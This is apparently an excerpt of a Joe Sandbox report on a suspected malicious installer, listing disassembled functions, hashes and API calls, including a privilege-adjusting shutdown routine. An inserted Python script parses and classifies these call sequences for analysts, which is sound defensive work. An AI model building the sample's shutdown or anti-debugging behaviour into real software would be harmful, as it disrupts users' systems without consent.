                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 23f67715b0627b500c1a1837273300f289b9fe750c9605b98d080578e430f9ca
                            • Instruction ID: 12e895623f3844da79fdeddd06a45dbb05635edc55d49c77215cd5b001435ea0
                            • Opcode Fuzzy Hash: 23f67715b0627b500c1a1837273300f289b9fe750c9605b98d080578e430f9ca
                            • Instruction Fuzzy Hash: 21118C71A0420AAFCF05CF59E944A9B3BF8EF48304F10406AF804AB301DA30EE21CBA4
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: 7259e54794bf41854ff4d5ac4812342929c18504ad46e5d5405d9b4e6585902f
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: A6014B72C0515ABFCF019FA8CC04AEEBFF5AF08214F144166ED24E26A0E7358A65DBD1
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6C117805,?,?,00000000,?,6C117805,00000000,0000000C), ref: 6C117B64
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b80bfac13adcc0dcdbef3518a958e1061b4c1509ba4206a77fca6cf386e198a8
                            • Instruction ID: 488f6648b9345ec5ed66b3c7deb1708924f3f2c30168036e68ac781dc333a90f
                            • Opcode Fuzzy Hash: b80bfac13adcc0dcdbef3518a958e1061b4c1509ba4206a77fca6cf386e198a8
                            • Instruction Fuzzy Hash: 51D06C3210014DBBDF028E84DC06EDA3BAAFB48715F014000BA1856020C736E861AB91
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: e8a022fbe185863756c581dfdb271ef419585068e1407d78ac5f5ba19188b9de
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: C
                            • API String ID: 4218353326-4157497815
                            • Opcode ID: 54e74848e73e09edbd813008685433ee66288c8709a4ab9c08ca174b23a50a4b
                            • Instruction ID: a41264f7ba7a822424eaaa95a9e3a59da206a88091fe5d4966b9074a77ff0624
                            • Opcode Fuzzy Hash: 54e74848e73e09edbd813008685433ee66288c8709a4ab9c08ca174b23a50a4b
                            • Instruction Fuzzy Hash: 99730531644B018FC728CF29C8D0B99B7F2AF853187598B6DC4A787A55EB74B58BCB40
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6C0F945A
                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0F9466
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0F9474
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0F949B
                            • NtInitiatePowerAction.NTDLL ref: 6C0F94AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: 1fae9e7ecd37cf5c00e256cb8d1f38fcee15b89cd61675b13a884f889eff45bc
                            • Instruction ID: e9cb8d0cb464210cd5bb71488e80fdc919790c6359b5063c64ef94c997dbeaa5
                            • Opcode Fuzzy Hash: 1fae9e7ecd37cf5c00e256cb8d1f38fcee15b89cd61675b13a884f889eff45bc
                            • Instruction Fuzzy Hash: 18F0B470644304ABEB00AF28DD0EB5A7BF8EF45711F004A09F995AA0D1D7706994DBD2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 316df1dd6c9b22930569af15fcd97da15e152250726c248d6bf56a03af2ecf85
                            • Instruction ID: e784828850beba515725c045f0b83c9fa0ad7c4f7d3b5db1c3480111737dc1cc
                            • Opcode Fuzzy Hash: 316df1dd6c9b22930569af15fcd97da15e152250726c248d6bf56a03af2ecf85
                            • Instruction Fuzzy Hash: 784235766083828FCB24CF68D49065ABBE1BBCA354F1449AEE4D5C7360D339D94ACB53
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C159CE5
                              • Part of subcall function 6C12FC2A: __EH_prolog.LIBCMT ref: 6C12FC2F
                              • Part of subcall function 6C1316A6: __EH_prolog.LIBCMT ref: 6C1316AB
                              • Part of subcall function 6C159A0E: __EH_prolog.LIBCMT ref: 6C159A13
                              • Part of subcall function 6C159837: __EH_prolog.LIBCMT ref: 6C15983C
                              • Part of subcall function 6C15D143: __EH_prolog.LIBCMT ref: 6C15D148
                              • Part of subcall function 6C15D143: ctype.LIBCPMT ref: 6C15D16C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction ID: 2d3e0bf60b2ba1b81e5fbcda9cb2db47ff3f229edfa9b85c67260bf27cbf4251
                            • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                            • Instruction Fuzzy Hash: D103DFB0800248DFDF11DFA4C990BECBBB0AF15308F5480D9D46967B91DB789B9ADB61
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C103969
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C103973
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C103980
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: e0e3d2c83ce8c3c400186d4831a9684517a4bca36d3c1e6fa2560558c956fa0f
                            • Instruction ID: 56374d8d5aad9dad409daa048e537af33555a9d75d0975967a9b0f4db428302d
                            • Opcode Fuzzy Hash: e0e3d2c83ce8c3c400186d4831a9684517a4bca36d3c1e6fa2560558c956fa0f
                            • Instruction Fuzzy Hash: AD31A47490121DABCB61DF69D988BCDBBF8BF08314F5045EAE81CA7250EB749B858F44
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,6C102925,6C0FD339,00000003,00000000,6C0FD339,00000000), ref: 6C10288F
                            • TerminateProcess.KERNEL32(00000000,?,6C102925,6C0FD339,00000003,00000000,6C0FD339,00000000), ref: 6C102896
                            • ExitProcess.KERNEL32 ref: 6C1028A8
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 646e34341b89ad954cc23fe080302075bc545c45ceba7ff9207998441afcc79d
                            • Instruction ID: 5f78066bbc6327cbb10280d5ecc6862ad87c5d32a4b03f537e44902e143a3d14
                            • Opcode Fuzzy Hash: 646e34341b89ad954cc23fe080302075bc545c45ceba7ff9207998441afcc79d
                            • Instruction Fuzzy Hash: E0E0EC39741108BFCF016F64C80DA9A3FB9FF45755B254426F81986A21CF3AE9E2DB80
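                             The three entries above read differently once decoded. The function at 6C0F945A is genuine shutdown/reboot capability: the sample opens its own token with access mask 0x28 (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), looks up SeShutdownPrivilege, adjusts its privileges, and calls NtInitiatePowerAction. The triples at 6C103969 (IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter) and 6C10288F (GetCurrentProcess / TerminateProcess / ExitProcess), by contrast, match call sequences the MSVC runtime links into every binary it builds (its fast-fail reporting and the UCRT exit path), so an IsDebuggerPresent hit in this particular function should not be weighted as author-written anti-debugging on its own. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses 'APIs' bullet lines in the format used on this page, converts each 'ref' address to an RVA against the dump base 6BF70000 so it can be looked up in the dumped PE, decodes the OpenProcessToken access mask, and tags each sequence. The CRT attribution table and the label names are the editor's assumptions; the sample lines are copied from the entries above and embedded as constructed input.

```python
import re
from dataclasses import dataclass, field

# Base of the dumped module, from the report's "Memory Dump Source" line
# ("Offset: 6BF70000, based on PE: true"); ref addresses are VAs in that image.
MODULE_BASE = 0x6BF70000

# OpenProcessToken DesiredAccess bits (winnt.h TOKEN_* constants).
TOKEN_ACCESS_BITS = {
    0x01: "TOKEN_ASSIGN_PRIMARY", 0x02: "TOKEN_DUPLICATE", 0x04: "TOKEN_IMPERSONATE",
    0x08: "TOKEN_QUERY", 0x10: "TOKEN_QUERY_SOURCE", 0x20: "TOKEN_ADJUST_PRIVILEGES",
    0x40: "TOKEN_ADJUST_GROUPS", 0x80: "TOKEN_ADJUST_DEFAULT", 0x100: "TOKEN_ADJUST_SESSIONID",
}

# Call triples the MSVC runtime links into every binary; they trip generic
# sandbox signatures but are not author-written logic. The attribution is the
# editor's assumption from well-known CRT code, not something the report states.
CRT_BOILERPLATE = {
    ("IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"):
        "MSVC runtime fast-fail / unhandled-exception reporting",
    ("GetCurrentProcess", "TerminateProcess", "ExitProcess"):
        "UCRT exit path (exit_or_terminate_process)",
}

# "• Api.MODULE(arg,...), ref: VA" or "• Api.MODULE ref: VA", optionally prefixed
# with "Part of subcall function XXXXXXXX:" as in this report's nested entries.
CALL_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{1,8}$")  # captured args that are real numbers, not "?"


@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)
    va: int = 0

    @property
    def rva(self) -> int:
        """Offset inside the dumped PE, directly usable in IDA/Ghidra on the dump."""
        return self.va - MODULE_BASE


def parse_calls(text: str) -> list:
    """Parse one entry's 'APIs' bullet lines; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_token_access(mask: int) -> list:
    """Expand a DesiredAccess value into TOKEN_* flag names (0x28 -> QUERY|ADJUST_PRIVILEGES)."""
    return [name for bit, name in sorted(TOKEN_ACCESS_BITS.items()) if mask & bit]


def classify(calls: list) -> tuple:
    """Tag a call sequence as CRT noise, shutdown capability, or unclassified."""
    names = tuple(c.api for c in calls)
    if names in CRT_BOILERPLATE:
        return "crt-boilerplate", CRT_BOILERPLATE[names]
    privs = [a for c in calls if c.api.startswith("LookupPrivilegeValue")
             for a in c.args if a.startswith("Se")]
    if "AdjustTokenPrivileges" in names and "NtInitiatePowerAction" in names:
        return "shutdown-capability", "enables %s, then NtInitiatePowerAction" % ",".join(privs)
    return "unclassified", ""


# Constructed input: the 'APIs' lines of four entries copied from this report.
SAMPLES = {
    "shutdown_6C0F945A": """
• GetCurrentProcess.KERNEL32 ref: 6C0F945A
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0F9466
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0F9474
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0F949B
• NtInitiatePowerAction.NTDLL ref: 6C0F94AF""",
    "fastfail_6C103969": """
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C103969
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C103973
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C103980""",
    "exit_6C10288F": """
• GetCurrentProcess.KERNEL32(00000000,?,6C102925,6C0FD339,00000003,00000000,6C0FD339,00000000), ref: 6C10288F
• TerminateProcess.KERNEL32(00000000,?,6C102925,6C0FD339,00000003,00000000,6C0FD339,00000000), ref: 6C102896
• ExitProcess.KERNEL32 ref: 6C1028A8""",
    "cxx_throw_6C0FAFA0": """
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0FAFA0
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0FB7C3
  • Part of subcall function 6C0FCA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0FB7AC,00000000,?,?,?,6C0FB7AC,?,6C12853C), ref: 6C0FCAC9""",
}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        calls = parse_calls(text)
        print(name, "->", *classify(calls))
        for c in calls:
            print("  rva=0x%06X %s.%s(%s)" % (c.rva, c.api, c.module, ",".join(c.args)))
            if c.api == "OpenProcessToken" and len(c.args) > 1 and HEX_RE.match(c.args[1]):
                print("    DesiredAccess:", "|".join(decode_token_access(int(c.args[1], 16))))
```

                             The parenthesised values in the report are stack contents captured at the call site, so only the leading ones are reliable as arguments; the decoder therefore only interprets the second value of OpenProcessToken, where DesiredAccess sits. The RVA of the first call (0x18945A) is the offset to open in the 6BF70000 dump to confirm the token-adjustment code by hand.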
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            • API String ID: 3519838083-1497497802
                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction ID: 1a9ba8530ca0790b01b9138af33bbde51143f5ebee9d1bf4fae5cca4c648bd33
                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction Fuzzy Hash: 6091F439D00119DBEF14EFA4C8A0AEDF771EF26308F208069D65267A51DB39D9C9CB94
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0FAFA0
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0FB7C3
                              • Part of subcall function 6C0FCA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0FB7AC,00000000,?,?,?,6C0FB7AC,?,6C12853C), ref: 6C0FCAC9
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: 91fbddfda399159828bbb53563d2e134cbb1acfe2e2cb8a7ee90ec341c7eb294
                            • Instruction ID: 950059469fb92fc85e96b23ae2872ef5f1ab745364460daa04eb33239ca78654
                            • Opcode Fuzzy Hash: 91fbddfda399159828bbb53563d2e134cbb1acfe2e2cb8a7ee90ec341c7eb294
                            • Instruction Fuzzy Hash: 9FB18D71A046099FDB04DF65D88179EBBF5FB49318F28812AD835E7B80D374A686CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: 8a8ebf6193cb148a2bbb40d310cbe00d44e8e0991e1f3560bf8810cd715dbc43
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 642191377A48564BE74CCA28DC33EB92680E748305B89527EE94BCB3D1DF6D8800CA48
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C14840F
                              • Part of subcall function 6C149137: __EH_prolog.LIBCMT ref: 6C14913C
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction ID: 72bd55ce9f459e27e4e45a5b319f65555c442df26d9ed7b93c9bf3716242271d
                            • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                            • Instruction Fuzzy Hash: 24627971D01259CFEF15CFA8C894BEEBBB5BF14308F14806AE905ABA80D7749A45CF91
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: YA1
                            • API String ID: 0-613462611
                            • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction ID: d9276804dee2b6819855010aa4b03703bcba6755e4e74ad4295a4bc236aa3150
                            • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                            • Instruction Fuzzy Hash: 4B42F4746093818FC315CF68C49069ABBE2FFD9308F25496DE9DA8B742D631D90BCB42
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: 3c9b2a56dbd8e2848529f455c87a7ff23f490512ec187d409181ca67ad43dfd7
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: 48510971A082559BE711CF5AC4C02EDFBF6EF7A214F18C05EE8C897242D27A598BC760
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction ID: 1e516af91596d37fa72076e40e6701c63263df70d5b5496adc86c0321d3f6924
                            • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                            • Instruction Fuzzy Hash: 8402CC356087808BD724DF68C49079EBBE2AFD9308F148A2DE8C997B50C775D946CB82
                            Strings
                            Memory Dump Source
